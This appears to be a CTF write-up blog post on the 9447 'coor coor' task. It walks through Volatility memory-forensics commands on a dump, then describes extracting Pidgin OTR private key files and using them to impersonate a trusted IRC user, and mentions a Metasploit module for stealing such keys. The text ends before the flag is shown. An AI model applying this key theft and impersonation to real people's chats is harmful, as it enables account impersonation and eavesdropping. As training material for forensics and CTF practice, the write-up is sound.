The Australian 9447 Security Society CTF took place on November 29-30 and it was yet another fun and really professionally organized CTF. I played with my friends from TheGoonies once again (The Goonies 'R' Good Enough, right?).
I found the task "coor coor" particularly interesting: it was a good way to practice some concepts from the new book I recently bought: The Art of Memory Forensics (authored by @attrc and @gleeda).
Task: coor coor (misc - 400)
A 9447 CTF organizer is giving away flags to friends that he trusts. This memory dump was taken off a competitor's computer after a raid by the pwnpolice.
Download provided: https://s3-us-west-2.amazonaws.com/elasticbeanstalk-us-west-2-467703568171/challenges/coorcoor.tar.bz2
Let's start by identifying the Operating System profile:
python vol.py -f challenge.vmem imageinfo
Let's take screenshot to see what the user was doing:
python vol.py -f challenge.vmem screenshot -D screenshot/
The user was running something inside VirtualBox, let's keep digging:
python vol.py -f challenge.vmem psxview
python vol.py -f challenge.vmem filescan | grep -e "\.tc\|TrueCrypt"
python vol.py -f challenge.vmem connscan
The host 184.108.40.206 (yodawg.9447.plumbing) happened to be an IRC server with only one active channel: #9447ctf. We can carve some pidgin logs using foremost:
python vol.py -f challenge.vmem mftparser | grep 9447ctf
Private conversations are not logged by default on Pidgin with the OTR extension. We can see a couple of OTR encrypted messages on the memory dump:
Because of Perfect Forward Secrecy, if you lose control of your private keys, no previous conversation is compromised. I just had the long term signature keys (otr.private_key) and these aren't actually used to encrypt conversations, just to sign the session encryption key. I still needed to retrieve the short term encryption keys from the memory. I got stuck on this phase and spent the whole night trying to figure how to do that.
After some time I decided to get some sleep and keep trying it on the following day. The first thing I did the next day was to re-read the challenge description and I quickly figured it out:
"A 9447 CTF organizer is giving away flags to friends that he trusts."Because of the way IRC works, I could easily impersonate testicool69 (the trusted frind), connect to the IRC server (yodawg.9447.plumbing:6667) and message acidburn88 (the CTF Admin) asking for the key. So how do I do that?
Pidgin-OTR creates three files during an encrypted communication: otr.private_key, otr.instance_tags and otr.fingerprints. I searched for the term "prpl-irc" on the memory dump, extracted and replaced those files on my own Pidgin installation (%APPDATA%\.purple). There's a Metasploit post-module to retrieve these keys from a live (hacked) system, by the way...
I managed to forge his fingerprint using the stolen private key and got the secret Flag: